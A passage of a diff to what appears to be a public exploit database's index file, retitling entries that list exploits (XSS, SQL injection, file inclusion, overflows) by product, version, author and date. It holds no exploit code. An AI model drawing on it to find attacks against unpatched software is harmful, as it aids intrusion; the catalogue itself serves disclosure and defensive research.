Viking board 0.1.2 forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 +30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 - post.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 - topic.php s Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 - forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - Index.php Directory Traversal",2007-07-25,Lostmon,php,webapps,0 -30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 +30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,Metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 @@ -27267,7 +27267,7 @@ id,file,description,date,author,platform,type,port 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 -30381,platforms/windows/remote/30381.txt,"Multiple Browser URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 +30381,platforms/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow (DEP Bypass)",2013-12-16,"Morteza Hashemi",windows,local,0 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - HGFS.Sys Local Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 @@ -27302,7 +27302,7 @@ id,file,description,date,author,platform,type,port 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0 30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0 -31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection",2008-03-20,xcorpitx,asp,webapps,0 +31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection",2008-03-20,xcorpitx,asp,webapps,0 31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",windows,dos,0 31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote,0 31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 @@ -27312,7 +27312,7 @@ id,file,description,date,author,platform,type,port 30414,platforms/windows/dos/30414.py,"GOM Player 2.2.56.5158 - (.avi) File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter - SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30422,platforms/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - (.wav) Integer Division by Zero",2013-12-22,"Osanda Malith",windows,dos,0 30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 Philboard_Forum.ASP SQL Injection",2007-07-27,Cr@zy_King,asp,webapps,0 30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 Yonetici.ASP SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 @@ -27329,7 +27329,7 @@ id,file,description,date,author,platform,type,port 30435,platforms/php/webapps/30435.txt,"IT!CMS 0.2 titletext-ed.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - index.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 vote.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 -30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 +30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 Webevent.CGI Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 @@ -27376,7 +27376,7 @@ id,file,description,date,author,platform,type,port 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30484,platforms/bsd/local/30484.c,"Systrace Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 -30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 Forms/General_1 sysSystemName Parameter XSS",2007-08-10,"Henri Lindberg",hardware,remote,0 +30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter XSS",2007-08-10,"Henri Lindberg",hardware,remote,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - Index.php Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 @@ -27395,7 +27395,7 @@ id,file,description,date,author,platform,type,port 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Remote Privilege Escalation",2007-08-15,"John Heasman",java,remote,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Remote Privilege Escalation",2007-08-16,forloop,linux,local,0 -30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 Admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 +30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - Admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic TextFileSearch.ASP Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 30506,platforms/hardware/dos/30506.txt,"Cisco IOS 12.3 Show IP BGP Regexp Remote Denial of Service",2007-08-17,anonymous,hardware,dos,0 30507,platforms/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 @@ -27436,7 +27436,7 @@ id,file,description,date,author,platform,type,port 30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos,0 -30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 +30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF",2013-12-28,"FIGHTERx war",hardware,webapps,0 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 @@ -27448,7 +27448,7 @@ id,file,description,date,author,platform,type,port 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 -30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 +30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - Admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 30556,platforms/php/webapps/30556.html,"Claroline 1.x - inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 30557,platforms/php/webapps/30557.txt,"Claroline 1.x - admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30558,platforms/php/webapps/30558.txt,"Claroline 1.x - admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 @@ -27476,11 +27476,11 @@ id,file,description,date,author,platform,type,port 30572,platforms/php/webapps/30572.txt,"phpMyQuote 0.20 - Index.php SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 30573,platforms/php/webapps/30573.txt,"SisfoKampus dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 -30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 +30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 text_search_action.php search_string Parameter XSS",2007-09-12,Doz,php,webapps,0 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos,0 -30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 +30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps,0 32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 @@ -27502,7 +27502,7 @@ id,file,description,date,author,platform,type,port 32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection",2008-09-22,"CWH Underground",asp,webapps,0 32400,platforms/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow",2008-09-22,sebug,multiple,dos,0 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS",2014-12-08,"Manish Tanwar",php,webapps,0 -32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 +32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server - Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting",2008-09-21,"DigiTrust Group",php,webapps,0 32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injection",2008-09-19,"Jan Van Niekerk",php,webapps,0 32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 @@ -27522,11 +27522,11 @@ id,file,description,date,author,platform,type,port 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 -30584,platforms/linux/dos/30584.py,"Boa 0.93.15 Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos,0 +30584,platforms/linux/dos/30584.py,"Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera Web Interface admin/restartMessage.shtml server Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 -30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 Command Execution",2007-09-17,anonymous,php,webapps,0 +30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field DoS",2007-09-17,j00ru//vx,windows,dos,0 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 @@ -27548,15 +27548,15 @@ id,file,description,date,author,platform,type,port 30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module Index.php SQL Injection",2007-09-24,"nights shadow",php,webapps,0 30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 NewGroup.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 Edit.jsp edittime Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 Comment.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 UserPreferences.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - Comment.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - UserPreferences.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30612,platforms/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - Login.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 Diff.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module Index.php Local File Inclusion",2007-09-25,waraxe,php,webapps,0 -30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 admin/ Default URI l_username Parameter XSS",2007-09-25,netVigilance,php,webapps,0 -30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 admin/emoticonlist.php l_emoticonlist Parameter XSS",2007-09-25,netVigilance,php,webapps,0 -30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 admin/layout2b.php l_username Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 -30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 comment.php backurl Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - admin/ Default URI l_username Parameter XSS",2007-09-25,netVigilance,php,webapps,0 +30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter XSS",2007-09-25,netVigilance,php,webapps,0 +30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer PNG Image - Local Denial Of Service",2007-07-26,"Xavier Roche",windows,dos,0 30620,platforms/linux/local/30620.txt,"Xen 3.0.3 pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 Buscar.ASP Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 @@ -27567,12 +27567,12 @@ id,file,description,date,author,platform,type,port 30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 detay.asp Emlak Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 30627,platforms/windows/remote/30627.pl,"FSD 2.052/3.000 sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote,0 30628,platforms/windows/dos/30628.txt,"FSD 2.052/3.000 servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,dos,0 -30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 Default.ASP SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 +30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - Default.ASP SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote,0 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - Index.php Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x - Index.php Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 -30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 +30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 @@ -27586,7 +27586,7 @@ id,file,description,date,author,platform,type,port 30644,platforms/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos,0 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",linux,dos,0 -30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.php Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 +30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - News_page.php Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 @@ -27616,7 +27616,7 @@ id,file,description,date,author,platform,type,port 31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0 -30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 +30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal tc/contents/home001.jsp contentid Parameter XSS",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal msg.jsp msg Parameter XSS",2007-10-15,JosS,jsp,webapps,0 @@ -27640,7 +27640,7 @@ id,file,description,date,author,platform,type,port 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 -30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 +30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 - Lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - Filename.ASP Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 - Index.php Local File Inclusion",2007-10-20,sekuru,php,webapps,0 @@ -27648,7 +27648,7 @@ id,file,description,date,author,platform,type,port 30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 - Index.php SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - Download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 -30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 +30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 @@ -27659,7 +27659,7 @@ id,file,description,date,author,platform,type,port 30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 -30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.php - Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 @@ -27679,7 +27679,7 @@ id,file,description,date,author,platform,type,port 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - Index.php Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 30733,platforms/php/webapps/30733.txt,"phpMyAdmin 